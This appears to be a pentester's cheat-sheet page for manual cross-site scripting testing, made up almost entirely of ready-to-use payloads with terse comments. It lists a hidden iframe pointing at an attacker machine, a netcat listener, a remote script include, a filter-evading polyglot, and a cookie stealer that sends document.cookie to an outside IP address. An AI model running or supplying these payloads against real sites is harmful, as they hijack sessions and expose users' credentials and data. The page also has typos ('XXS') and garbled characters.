XXS manual testing

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)

#Special characters that indicate the possibility of XXS

< > ' " { } ;

helloโ€œ;<>

Try:

<script>alert('XSS')</script>  #careful with single quotes font

#Content injection : redirecting user to malicious content

Embed an iframe within html code:

<iframe src=http://$KaliIP:80/report height='0' width='0'></iframe>

#netcat listener on port 80

nc -nvlp 80

#Submit the XXS payload through some login form / blog / query tab

#Shell

#Steal PHP session ID

<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

#Polyglot XXS payload 

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

#Cookie stealer 

<script>new Image().src="http://11.11.11.11/cool.jpg?output="+document.cookie;</script>
PreviousXSS Cross Site ScriptingNextPWN-XSS

Last updated